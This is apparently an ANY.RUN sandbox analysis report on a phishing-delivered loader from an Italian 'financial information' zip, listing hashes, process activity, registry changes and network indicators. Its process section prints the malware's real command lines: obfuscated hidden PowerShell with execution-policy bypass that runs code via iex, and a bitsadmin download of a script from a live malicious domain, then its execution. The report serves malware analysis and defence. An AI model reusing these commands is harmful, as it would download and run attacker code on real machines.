analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

https://phlpride.com/.area-clienti/informazioni-finanziarie-MN19493

Full analysis: https://app.any.run/tasks/6428732d-398b-455d-bc3f-5d74d1d25729
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 06, 2018, 16:58:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MD5:

583B37EC0FBFD7044FBFF23C209133E0

SHA1:

E1962120AAA35A85DA201B7B7006EB1F40E58F88

SHA256:

D46E9A2BCFFE12CC51FEEA6D662177BFFC4744022178E1D675833F9F9AB34E57

SSDEEP:

3:N8JbwA2KjhGJzLM3KY2EELkztkn:21wAmM3KxEikp8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3808)
      • cmd.exe (PID: 2508)
    • Actions looks like stealing of personal data

      • powershell.exe (PID: 2412)
    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 3760)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2936)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 3780)
  • SUSPICIOUS

    • Application launched itself

      • WinRAR.exe (PID: 3140)
    • Creates files in the user directory

      • powershell.exe (PID: 2412)
      • cmd.exe (PID: 3760)
      • powershell.exe (PID: 3860)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2412)
      • powershell.exe (PID: 3860)
    • Uses IPCONFIG.EXE to discover IP address

      • powershell.exe (PID: 3860)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 3452)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3452)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3744)
    • Changes internet zones settings

      • iexplore.exe (PID: 3452)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
14
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe winrar.exe no specs winrar.exe explorer.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs powershell.exe no specs ipconfig.exe no specs cmd.exe no specs schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3452"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3744"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3452 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3140"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\informazioni-finanziarie-MN19493[1].zip"C:\Program Files\WinRAR\WinRAR.exeiexplore.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
924"C:\Program Files\WinRAR\WinRAR.exe" -elevate3140C:\Program Files\WinRAR\WinRAR.exe
WinRAR.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
HIGH
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2488"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3808"C:\Windows\System32\cmd.exe" /C powershell.exe -nop -eP bypaSs -win hi"d"den -c "&{$n3de=dir -recurse -force -path c:\users\* -include informazioni-finanziarie-*.zip;$k7a=gc -LiteralPat $n3de.fullname;$k7a[$k7a.length-1]|iex}"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2412powershell.exe -nop -eP bypaSs -win hi"d"den -c "&{$n3de=dir -recurse -force -path c:\users\* -include informazioni-finanziarie-*.zip;$k7a=gc -LiteralPat $n3de.fullname;$k7a[$k7a.length-1]|iex}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3760"C:\Windows\system32\cmd.exe" /c echo 1 > C:\Users\admin\AppData\Roaming\D103199D-3C3F-AB45-A928-AB014D429B1F\d & bitsadmin /wrap /transfer merdilapser /download /priority FoReGrOund "https://facelook.cascadesnowboarders.com/casca/board" C:\Users\admin\AppData\Roaming\D103199D-3C3F-AB45-A928-AB014D429B1F\MYdkhVOlTyWDui.ps1 & del C:\Users\admin\AppData\Roaming\D103199D-3C3F-AB45-A928-AB014D429B1F\d & exit C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2256bitsadmin /wrap /transfer merdilapser /download /priority FoReGrOund "https://facelook.cascadesnowboarders.com/casca/board" C:\Users\admin\AppData\Roaming\D103199D-3C3F-AB45-A928-AB014D429B1F\MYdkhVOlTyWDui.ps1 C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2508"C:\Windows\system32\cmd.exe" /c powershell -noLogo -nop -ep bypass -File C:\Users\admin\AppData\Roaming\D103199D-3C3F-AB45-A928-AB014D429B1F\MYdkhVOlTyWDui.ps1 & exit C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 700
Read events
1 493
Write events
203
Delete events
4

Modification events

(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{4318B1E9-F978-11E8-BAD8-5254004A04AF}
Value:
0
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
3
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E2070C000400060010003B001000FE02
Executable files
0
Suspicious files
6
Text files
10
Unknown types
3

Dropped files

PID
Process
Filename
Type
3452iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3452iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3452iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF93D1764460694B18.TMP
MD5:
SHA256:
3452iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFFBEFE397BD281A02.TMP
MD5:
SHA256:
3452iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{4318B1E9-F978-11E8-BAD8-5254004A04AF}.dat
MD5:
SHA256:
2412powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5YZ0LZMNK25LNRXVK3VZ.temp
MD5:
SHA256:
3860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K2Z8VILUXA93JJ1Z0HRB.temp
MD5:
SHA256:
924WinRAR.exeC:\Fatturazione elettronica.lnklnk
MD5:57D1C4C0857D8ABDD0FD089FAF485013
SHA256:223FAA681D383514BE01ED56023A6B321821DBA878B8C15D22730F1E2CB736F3
2412powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1a6b6d.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3452
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3452
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3744
iexplore.exe
91.218.127.105:443
phlpride.com
Serverius Holding B.V.
NL
unknown
185.103.97.202:443
facelook.cascadesnowboarders.com
UK Dedicated Servers Limited
GB
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
phlpride.com
  • 91.218.127.105
unknown
facelook.cascadesnowboarders.com
  • 185.103.97.202
unknown

Threats

No threats detected
No debug info